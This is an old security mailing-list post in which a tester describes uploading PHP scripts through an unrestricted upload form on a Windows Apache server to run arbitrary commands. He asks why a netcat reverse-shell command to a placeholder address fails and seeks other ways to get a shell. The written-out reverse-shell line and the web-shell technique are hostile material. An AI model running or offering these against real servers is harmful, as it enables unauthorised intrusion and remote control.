php and netcat?

From: Maarten (secfocusat_private)
Date: Tue Feb 18 2003 - 11:24:05 PST

    Hi,

    I am testing a windows based apache server, that's got php and mysql
    installed on it. I found a php script that allows uploading other php
    scripts. The upload directory is also readable and executable. So I have
    uploaded some of my own scripts and can execute any command I want using
    `cmd /c command.exe`

    I am looking for ways to further exploit this server. The file system is
    probably "everyone full control". Have not tested that yet. What I tried to
    do was using netcat to send a command shell to my own machine (cmd /c nc
    333.333.333.333 333 -e cmd.exe). I can see with tcpdump that the webserver
    contacts my own machine on port 333, however, I do not get a command prompt
    like I am getting when running the same netcat command from the command
    prompt of a windows machine. Anyone know why?

    If anyone knows an alternative to get a shell on the server, I would also
    appreciate it. Of course I can run any command through php, but there should
    be alternatives..... An alternative to my netcat idea is also
    appreciated }-)

    maarten

    Do you know the base address of the Global Offset Table (GOT) on a Solaris 8
    box?
    CORE IMPACT does.
    www.securityfocus.com/core